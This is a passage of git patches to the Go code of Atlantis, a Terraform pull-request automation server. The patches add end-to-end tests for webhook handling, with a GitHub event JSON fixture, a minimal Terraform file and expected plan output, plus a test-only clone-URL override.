 server/events_controller_e2e_test.go          | 210 ++++++++++++++++++
 .../testfixtures/githubIssueCommentEvent.json | 207 +++++++++++++++++
 .../simple/exp-output-atlantis-plan.txt       |  23 ++
 server/testfixtures/test-repos/simple/main.tf |   3 +
 6 files changed, 459 insertions(+), 5 deletions(-)
 create mode 100644 server/events_controller_e2e_test.go
 create mode 100644 server/testfixtures/githubIssueCommentEvent.json
 create mode 100644 server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt
 create mode 100644 server/testfixtures/test-repos/simple/main.tf

diff --git a/server/events/project_operator.go b/server/events/project_operator.go
index 37dfcb5f01..2c6c5c558b 100644
--- a/server/events/project_operator.go
+++ b/server/events/project_operator.go
@@ -22,6 +22,7 @@ import (
 	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/webhooks"
 	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+	"github.com/runatlantis/atlantis/server/logging"
 )
 
 //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator
@@ -30,6 +31,10 @@ type LockURLGenerator interface {
 	GenerateLockURL(lockID string) string
 }
 
+type WebhooksSender interface {
+	Send(log *logging.SimpleLogger, result webhooks.ApplyResult) error
+}
+
 // PlanSuccess is the result of a successful plan.
 type PlanSuccess struct {
 	TerraformOutput string
@@ -45,7 +50,7 @@ type ProjectOperator struct {
 	RunStepOperator   runtime.RunStepOperator
 	ApprovalOperator  runtime.ApprovalOperator
 	Workspace         AtlantisWorkspace
-	Webhooks          *webhooks.MultiWebhookSender
+	Webhooks          WebhooksSender
 }
 
 func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr *string) ProjectResult {
diff --git a/server/events_controller.go b/server/events_controller.go
index b5b3c73300..b205f2eb8d 100644
--- a/server/events_controller.go
+++ b/server/events_controller.go
@@ -55,6 +55,7 @@ type EventsController struct {
 	AtlantisGithubUser models.User
 	// AtlantisGitlabUser is the user that atlantis is running as for Gitlab.
 	AtlantisGitlabUser models.User
+	TestingMode        bool
 }
 
 // Post handles POST webhook requests.
@@ -254,11 +255,16 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo
 		return
 	}
 
-	// Respond with success and then actually execute the command asynchronously.
-	// We use a goroutine so that this function returns and the connection is
-	// closed.
 	fmt.Fprintln(w, "Processing...")
-	go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pullNum, parseResult.Command)
+	if !e.TestingMode {
+		// Respond with success and then actually execute the command asynchronously.
+		// We use a goroutine so that this function returns and the connection is
+		// closed.
+		go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pullNum, parseResult.Command)
+	} else {
+		// When testing we want to wait for everything to complete.
+		e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pullNum, parseResult.Command)
+	}
 }
 
 // HandleGitlabMergeRequestEvent will delete any locks associated with the pull
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
new file mode 100644
index 0000000000..97883c0a14
--- /dev/null
+++ b/server/events_controller_e2e_test.go
@@ -0,0 +1,210 @@
+package server_test
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"github.com/google/go-github/github"
+	. "github.com/petergtz/pegomock"
+	"github.com/runatlantis/atlantis/server"
+	"github.com/runatlantis/atlantis/server/events"
+	"github.com/runatlantis/atlantis/server/events/locking"
+	"github.com/runatlantis/atlantis/server/events/locking/boltdb"
+	"github.com/runatlantis/atlantis/server/events/mocks"
+	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
+	"github.com/runatlantis/atlantis/server/events/models"
+	"github.com/runatlantis/atlantis/server/events/runtime"
+	"github.com/runatlantis/atlantis/server/events/terraform"
+	vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
+	"github.com/runatlantis/atlantis/server/events/webhooks"
+	"github.com/runatlantis/atlantis/server/events/yaml"
+	"github.com/runatlantis/atlantis/server/logging"
+	. "github.com/runatlantis/atlantis/testing"
+)
+
+func Test(t *testing.T) {
+	RegisterMockTestingT(t)
+
+	// Config.
+	allowForkPRs := false
+	dataDir, cleanup := TempDir(t)
+	defer cleanup()
+
+	// Mocks.
+	e2eVCSClient := vcsmocks.NewMockClientProxy()
+	e2eStatusUpdater := mocks.NewMockCommitStatusUpdater()
+	e2eGithubGetter := mocks.NewMockGithubPullGetter()
+	e2eGitlabGetter := mocks.NewMockGitlabMergeRequestGetter()
+	e2eWorkspace := mocks.NewMockAtlantisWorkspace()
+
+	// Real dependencies.
+	logger := logging.NewSimpleLogger("server", nil, true, logging.Debug)
+	eventParser := &events.EventParser{
+		GithubUser:  "github-user",
+		GithubToken: "github-token",
+		GitlabUser:  "gitlab-user",
+		GitlabToken: "gitlab-token",
+	}
+	commentParser := &events.CommentParser{
+		GithubUser:  "github-user",
+		GithubToken: "github-token",
+		GitlabUser:  "gitlab-user",
+		GitlabToken: "gitlab-token",
+	}
+	terraformClient, err := terraform.NewClient(dataDir)
+	Ok(t, err)
+	boltdb, err := boltdb.New(dataDir)
+	Ok(t, err)
+	lockingClient := locking.NewClient(boltdb)
+	projectLocker := &events.DefaultProjectLocker{
+		Locker: lockingClient,
+	}
+
+	defaultTFVersion := terraformClient.Version()
+	commandHandler := &events.CommandHandler{
+		EventParser:              eventParser,
+		VCSClient:                e2eVCSClient,
+		GithubPullGetter:         e2eGithubGetter,
+		GitlabMergeRequestGetter: e2eGitlabGetter,
+		CommitStatusUpdater:      e2eStatusUpdater,
+		AtlantisWorkspaceLocker:  events.NewDefaultAtlantisWorkspaceLocker(),
+		MarkdownRenderer:         &events.MarkdownRenderer{},
+		Logger:                   logger,
+		AllowForkPRs:             allowForkPRs,
+		AllowForkPRsFlag:         "allow-fork-prs",
+		PullRequestOperator: &events.DefaultPullRequestOperator{
+			TerraformExecutor: terraformClient,
+			DefaultTFVersion:  defaultTFVersion,
+			ParserValidator:   &yaml.ParserValidator{},
+			ProjectFinder:     &events.DefaultProjectFinder{},
+			VCSClient:         e2eVCSClient,
+			Workspace:         e2eWorkspace,
+			ProjectOperator: events.ProjectOperator{
+				Locker:           projectLocker,
+				LockURLGenerator: &mockLockURLGenerator{},
+				InitStepOperator: runtime.InitStepOperator{
+					TerraformExecutor: terraformClient,
+					DefaultTFVersion:  defaultTFVersion,
+				},
+				PlanStepOperator: runtime.PlanStepOperator{
+					TerraformExecutor: terraformClient,
+					DefaultTFVersion:  defaultTFVersion,
+				},
+				ApplyStepOperator: runtime.ApplyStepOperator{
+					TerraformExecutor: terraformClient,
+				},
+				RunStepOperator: runtime.RunStepOperator{},
+				ApprovalOperator: runtime.ApprovalOperator{
+					VCSClient: e2eVCSClient,
+				},
+				Workspace: e2eWorkspace,
+				Webhooks:  &mockWebhookSender{},
+			},
+		},
+	}
+
+	ctrl := server.EventsController{
+		TestingMode:            true,
+		CommandRunner:          commandHandler,
+		PullCleaner:            nil,
+		Logger:                 logger,
+		Parser:                 eventParser,
+		CommentParser:          commentParser,
+		GithubWebHookSecret:    nil,
+		GithubRequestValidator: &server.DefaultGithubRequestValidator{},
+		GitlabRequestParser:    &server.DefaultGitlabRequestParser{},
+		GitlabWebHookSecret:    nil,
+		RepoWhitelist: &events.RepoWhitelist{
+			Whitelist: "*",
+		},
+		SupportedVCSHosts: []models.VCSHostType{models.Gitlab, models.Github},
+		VCSClient:         e2eVCSClient,
+		AtlantisGithubUser: models.User{
+			Username: "atlantisbot",
+		},
+		AtlantisGitlabUser: models.User{
+			Username: "atlantisbot",
+		},
+	}
+
+	// Test GitHub Post
+	req := GitHubCommentEvent(t, "atlantis plan")
+	w := httptest.NewRecorder()
+	When(e2eGithubGetter.GetPullRequest(AnyRepo(), AnyInt())).ThenReturn(GitHubPullRequestParsed(), nil)
+	testRepoDir, err := filepath.Abs("testfixtures/test-repos/simple")
+	Ok(t, err)
+	When(e2eWorkspace.Clone(matchers.AnyPtrToLoggingSimpleLogger(), AnyRepo(), AnyRepo(), matchers.AnyModelsPullRequest(), AnyString())).ThenReturn(testRepoDir, nil)
+	// Clean up .terraform and plan files when we're done.
+	defer func() {
+		os.RemoveAll(filepath.Join(testRepoDir, ".terraform"))
+		planFiles, _ := filepath.Glob(testRepoDir + "/*.tfplan")
+		for _, file := range planFiles {
+			os.Remove(file)
+		}
+	}()
+
+	ctrl.Post(w, req)
+	responseContains(t, w, 200, "Processing...")
+	_, _, comment := e2eVCSClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+
+	exp, err := ioutil.ReadFile(filepath.Join(testRepoDir, "exp-output-atlantis-plan.txt"))
+	fmt.Println((string(exp)))
+	Ok(t, err)
+
+	Equals(t, string(exp), comment)
+}
+
+type mockLockURLGenerator struct{}
+
+func (m *mockLockURLGenerator) GenerateLockURL(lockID string) string {
+	return "lock-url"
+}
+
+type mockWebhookSender struct{}
+
+func (w *mockWebhookSender) Send(log *logging.SimpleLogger, result webhooks.ApplyResult) error {
+	return nil
+}
+
+func GitHubCommentEvent(t *testing.T, comment string) *http.Request {
+	requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubIssueCommentEvent.json"))
+	Ok(t, err)
+	requestJSON = []byte(strings.Replace(string(requestJSON), "###comment body###", comment, 1))
+	req, err := http.NewRequest("POST", "/events", bytes.NewBuffer(requestJSON))
+	Ok(t, err)
+	req.Header.Set("Content-Type", "application/json")
+	req.Header.Set(githubHeader, "issue_comment")
+	return req
+}
+
+func GitHubPullRequestParsed() *github.PullRequest {
+	return &github.PullRequest{
+		Number:  github.Int(1),
+		State:   github.String("open"),
+		HTMLURL: github.String("htmlurl"),
+		Head: &github.PullRequestBranch{
+			Repo: &github.Repository{
+				FullName: github.String("runatlantis/atlantis-tests"),
+				CloneURL: github.String("/runatlantis/atlantis-tests.git"),
+			},
+			SHA: github.String("sha"),
+			Ref: github.String("branch"),
+		},
+		Base: &github.PullRequestBranch{
+			Repo: &github.Repository{
+				FullName: github.String("runatlantis/atlantis-tests"),
+				CloneURL: github.String("/runatlantis/atlantis-tests.git"),
+			},
+		},
+		User: &github.User{
+			Login: github.String("atlantisbot"),
+		},
+	}
+}
diff --git a/server/testfixtures/githubIssueCommentEvent.json b/server/testfixtures/githubIssueCommentEvent.json
new file mode 100644
index 0000000000..a15f67ed4a
--- /dev/null
+++ b/server/testfixtures/githubIssueCommentEvent.json
@@ -0,0 +1,207 @@
+{
+  "action": "created",
+  "issue": {
+    "url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1",
+    "repository_url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+    "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/labels{/name}",
+    "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/comments",
+    "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/events",
+    "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1",
+    "id": 330256251,
+    "node_id": "MDExOlB1bGxSZXF1ZXN0MTkzMzA4NzA3",
+    "number": 1,
+    "title": "Add new project layouts",
+    "user": {
+      "login": "runatlantis",
+      "id": 1034429,
+      "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+      "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+      "gravatar_id": "",
+      "url": "https://api.github.com/users/runatlantis",
+      "html_url": "https://github.com/runatlantis",
+      "followers_url": "https://api.github.com/users/runatlantis/followers",
+      "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+      "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+      "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+      "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+      "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+      "repos_url": "https://api.github.com/users/runatlantis/repos",
+      "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+      "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+      "type": "User",
+      "site_admin": false
+    },
+    "labels": [
+
+    ],
+    "state": "open",
+    "locked": false,
+    "assignee": null,
+    "assignees": [
+
+    ],
+    "milestone": null,
+    "comments": 61,
+    "created_at": "2018-06-07T12:45:41Z",
+    "updated_at": "2018-06-13T12:53:40Z",
+    "closed_at": null,
+    "author_association": "OWNER",
+    "pull_request": {
+      "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1",
+      "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1",
+      "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/1.diff",
+      "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/1.patch"
+    },
+    "body": ""
+  },
+  "comment": {
+    "url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments/396926483",
+    "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1#issuecomment-396926483",
+    "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1",
+    "id": 396926483,
+    "node_id": "MDEyOklzc3VlQ29tbWVudDM5NjkyNjQ4Mw==",
+    "user": {
+      "login": "runatlantis",
+      "id": 1034429,
+      "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+      "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+      "gravatar_id": "",
+      "url": "https://api.github.com/users/runatlantis",
+      "html_url": "https://github.com/runatlantis",
+      "followers_url": "https://api.github.com/users/runatlantis/followers",
+      "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+      "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+      "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+      "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+      "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+      "repos_url": "https://api.github.com/users/runatlantis/repos",
+      "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+      "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+      "type": "User",
+      "site_admin": false
+    },
+    "created_at": "2018-06-13T12:53:40Z",
+    "updated_at": "2018-06-13T12:53:40Z",
+    "author_association": "OWNER",
+    "body": "###comment body###"
+  },
+  "repository": {
+    "id": 136474117,
+    "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+    "name": "atlantis-tests",
+    "full_name": "runatlantis/atlantis-tests",
+    "owner": {
+      "login": "runatlantis",
+      "id": 1034429,
+      "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+      "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+      "gravatar_id": "",
+      "url": "https://api.github.com/users/runatlantis",
+      "html_url": "https://github.com/runatlantis",
+      "followers_url": "https://api.github.com/users/runatlantis/followers",
+      "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+      "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+      "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+      "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+      "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+      "repos_url": "https://api.github.com/users/runatlantis/repos",
+      "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+      "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+      "type": "User",
+      "site_admin": false
+    },
+    "private": false,
+    "html_url": "https://github.com/runatlantis/atlantis-tests",
+    "description": "A set of terraform projects that atlantis e2e tests run on.",
+    "fork": true,
+    "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+    "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+    "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+    "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+    "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+    "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+    "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+    "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+    "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+    "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+    "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+    "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+    "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+    "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+    "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+    "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+    "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+    "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+    "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+    "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+    "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+    "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+    "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+    "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+    "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+    "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+    "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+    "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+    "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+    "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+    "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+    "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+    "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+    "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+    "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+    "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+    "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+    "created_at": "2018-06-07T12:28:23Z",
+    "updated_at": "2018-06-07T12:28:27Z",
+    "pushed_at": "2018-06-11T16:22:17Z",
+    "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+    "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+    "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+    "svn_url": "https://github.com/runatlantis/atlantis-tests",
+    "homepage": null,
+    "size": 8,
+    "stargazers_count": 0,
+    "watchers_count": 0,
+    "language": "HCL",
+    "has_issues": false,
+    "has_projects": true,
+    "has_downloads": true,
+    "has_wiki": false,
+    "has_pages": false,
+    "forks_count": 0,
+    "mirror_url": null,
+    "archived": false,
+    "open_issues_count": 2,
+    "license": {
+      "key": "other",
+      "name": "Other",
+      "spdx_id": null,
+      "url": null,
+      "node_id": "MDc6TGljZW5zZTA="
+    },
+    "forks": 0,
+    "open_issues": 2,
+    "watchers": 0,
+    "default_branch": "master"
+  },
+  "sender": {
+    "login": "runatlantis",
+    "id": 1034429,
+    "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+    "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+    "gravatar_id": "",
+    "url": "https://api.github.com/users/runatlantis",
+    "html_url": "https://github.com/runatlantis",
+    "followers_url": "https://api.github.com/users/runatlantis/followers",
+    "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+    "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+    "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+    "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+    "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+    "repos_url": "https://api.github.com/users/runatlantis/repos",
+    "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+    "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+    "type": "User",
+    "site_admin": false
+  }
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt
new file mode 100644
index 0000000000..15a712c428
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/simple/main.tf b/server/testfixtures/test-repos/simple/main.tf
new file mode 100644
index 0000000000..648c412e1f
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/main.tf
@@ -0,0 +1,3 @@
+resource "null_resource" "simple" {
+  count = 1
+}
\ No newline at end of file

From a9e9e18f2e4e648afb5051bc063dd8a60bc75da0 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Sat, 16 Jun 2018 18:11:30 +0100
Subject: [PATCH 24/69] Enable multiple cases for e2e testing

---
 server/events/atlantis_workspace.go           |   9 +-
 server/events_controller.go                   |   7 +-
 server/events_controller_e2e_test.go          | 164 ++++--
 .../githubPullRequestClosedEvent.json         | 468 ++++++++++++++++++
 .../githubPullRequestOpenedEvent.json         | 468 ++++++++++++++++++
 .../testfixtures/test-repos/simple/.gitkeep   |   0
 .../test-repos/simple/exp-output-apply.txt    |  13 +
 .../test-repos/simple/exp-output-autoplan.txt |  23 +
 .../test-repos/simple/exp-output-merge.txt    |   3 +
 server/testfixtures/test-repos/simple/main.tf |   8 +
 10 files changed, 1126 insertions(+), 37 deletions(-)
 create mode 100644 server/testfixtures/githubPullRequestClosedEvent.json
 create mode 100644 server/testfixtures/githubPullRequestOpenedEvent.json
 create mode 100644 server/testfixtures/test-repos/simple/.gitkeep
 create mode 100644 server/testfixtures/test-repos/simple/exp-output-apply.txt
 create mode 100644 server/testfixtures/test-repos/simple/exp-output-autoplan.txt
 create mode 100644 server/testfixtures/test-repos/simple/exp-output-merge.txt

diff --git a/server/events/atlantis_workspace.go b/server/events/atlantis_workspace.go
index a57aee053f..190b87790d 100644
--- a/server/events/atlantis_workspace.go
+++ b/server/events/atlantis_workspace.go
@@ -42,6 +42,9 @@ type AtlantisWorkspace interface {
 // FileWorkspace implements AtlantisWorkspace with the file system.
 type FileWorkspace struct {
 	DataDir string
+	// TestingOverrideCloneURL can be used during testing to override the URL
+	// that is cloned. If it's empty then we clone normally.
+	TestingOverrideCloneURL string
 }
 
 // Clone git clones headRepo, checks out the branch and then returns the absolute
@@ -68,7 +71,11 @@ func (w *FileWorkspace) Clone(
 	}
 
 	log.Info("git cloning %q into %q", headRepo.SanitizedCloneURL, cloneDir)
-	cloneCmd := exec.Command("git", "clone", headRepo.CloneURL, cloneDir) // #nosec
+	cloneURL := headRepo.CloneURL
+	if w.TestingOverrideCloneURL != "" {
+		cloneURL = w.TestingOverrideCloneURL
+	}
+	cloneCmd := exec.Command("git", "clone", cloneURL, cloneDir) // #nosec
 	if output, err := cloneCmd.CombinedOutput(); err != nil {
 		return "", errors.Wrapf(err, "cloning %s: %s", headRepo.SanitizedCloneURL, string(output))
 	}
diff --git a/server/events_controller.go b/server/events_controller.go
index b205f2eb8d..e9ee6e1e01 100644
--- a/server/events_controller.go
+++ b/server/events_controller.go
@@ -177,7 +177,12 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep
 		// workspace to '*' to indicate that all applicable dirs and workspaces
 		// should be planned.
 		autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", true)
-		go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd)
+		if !e.TestingMode {
+			go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd)
+		} else {
+			// When testing we want to wait for everything to complete.
+			e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd)
+		}
 		return
 	case ClosedPullEvent:
 		// If the pull request was closed, we delete locks.
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
index 97883c0a14..8a9bd66915 100644
--- a/server/events_controller_e2e_test.go
+++ b/server/events_controller_e2e_test.go
@@ -6,8 +6,8 @@ import (
 	"io/ioutil"
 	"net/http"
 	"net/http/httptest"
-	"os"
 	"path/filepath"
+	"regexp"
 	"strings"
 	"testing"
 
@@ -29,20 +29,111 @@ import (
 	. "github.com/runatlantis/atlantis/testing"
 )
 
-func Test(t *testing.T) {
+/*
+flows:
+- pull request opened autoplan
+- comment to apply
+
+github/gitlab
+
+locking
+
+merging pull requests
+
+different repo organizations
+
+atlantis.yaml
+
+*/
+func TestGitHubWorkflow(t *testing.T) {
 	RegisterMockTestingT(t)
 
-	// Config.
+	cases := []struct {
+		Description string
+		// RepoDir is relative to testfixtures/test-repos.
+		RepoDir                string
+		ModifiedFiles          []string
+		ExpAutoplanCommentFile string
+		ExpMergeCommentFile    string
+		CommentAndReplies      []string
+	}{
+		{
+			Description:            "simple",
+			RepoDir:                "simple",
+			ModifiedFiles:          []string{"main.tf"},
+			ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+			CommentAndReplies: []string{
+				"atlantis apply", "exp-output-apply.txt",
+			},
+			ExpMergeCommentFile: "exp-output-merge.txt",
+		},
+	}
+	for _, c := range cases {
+		ctrl, vcsClient, githubGetter, atlantisWorkspace := setupE2E(t)
+		t.Run(c.Description, func(t *testing.T) {
+			// Set the repo to be cloned through the testing backdoor.
+			repoDir, err := filepath.Abs(filepath.Join("testfixtures", "test-repos", c.RepoDir))
+			Ok(t, err)
+			atlantisWorkspace.TestingOverrideCloneURL = fmt.Sprintf("file://%s", repoDir)
+
+			// Setup test dependencies.
+			w := httptest.NewRecorder()
+			When(githubGetter.GetPullRequest(AnyRepo(), AnyInt())).ThenReturn(GitHubPullRequestParsed(), nil)
+			When(vcsClient.GetModifiedFiles(AnyRepo(), matchers.AnyModelsPullRequest())).ThenReturn(c.ModifiedFiles, nil)
+
+			// First, send the open pull request event and trigger an autoplan.
+			pullOpenedReq := GitHubPullRequestOpenedEvent(t)
+			ctrl.Post(w, pullOpenedReq)
+			responseContains(t, w, 200, "Processing...")
+			_, _, autoplanComment := vcsClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+			exp, err := ioutil.ReadFile(filepath.Join(repoDir, c.ExpAutoplanCommentFile))
+			Ok(t, err)
+			Equals(t, string(exp), autoplanComment)
+
+			// Now send any other comments.
+			for i := 0; i < len(c.CommentAndReplies); i += 2 {
+				comment := c.CommentAndReplies[i]
+				expOutputFile := c.CommentAndReplies[i+1]
+
+				commentReq := GitHubCommentEvent(t, comment)
+				w = httptest.NewRecorder()
+				ctrl.Post(w, commentReq)
+				responseContains(t, w, 200, "Processing...")
+				_, _, autoplanComment = vcsClient.VerifyWasCalled(Twice()).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+
+				exp, err = ioutil.ReadFile(filepath.Join(repoDir, expOutputFile))
+				Ok(t, err)
+				// Replace all 'ID: 1111818181' strings with * so we can do a comparison.
+				idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`)
+				autoplanComment = idRegex.ReplaceAllString(autoplanComment, "(ID: ******************)")
+				Equals(t, string(exp), autoplanComment)
+			}
+
+			// Finally, send the pull request merged event.
+			pullClosedReq := GitHubPullRequestClosedEvent(t)
+			w = httptest.NewRecorder()
+			ctrl.Post(w, pullClosedReq)
+			responseContains(t, w, 200, "Pull request cleaned successfully")
+			_, _, pullClosedComment := vcsClient.VerifyWasCalled(Times(3)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+			exp, err = ioutil.ReadFile(filepath.Join(repoDir, c.ExpMergeCommentFile))
+			Ok(t, err)
+			Equals(t, string(exp), pullClosedComment)
+		})
+	}
+}
+
+func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, *mocks.MockGithubPullGetter, *events.FileWorkspace) {
 	allowForkPRs := false
 	dataDir, cleanup := TempDir(t)
 	defer cleanup()
+	testRepoDir, err := filepath.Abs("testfixtures/test-repos/simple")
+	Ok(t, err)
 
 	// Mocks.
 	e2eVCSClient := vcsmocks.NewMockClientProxy()
 	e2eStatusUpdater := mocks.NewMockCommitStatusUpdater()
 	e2eGithubGetter := mocks.NewMockGithubPullGetter()
 	e2eGitlabGetter := mocks.NewMockGitlabMergeRequestGetter()
-	e2eWorkspace := mocks.NewMockAtlantisWorkspace()
 
 	// Real dependencies.
 	logger := logging.NewSimpleLogger("server", nil, true, logging.Debug)
@@ -66,6 +157,10 @@ func Test(t *testing.T) {
 	projectLocker := &events.DefaultProjectLocker{
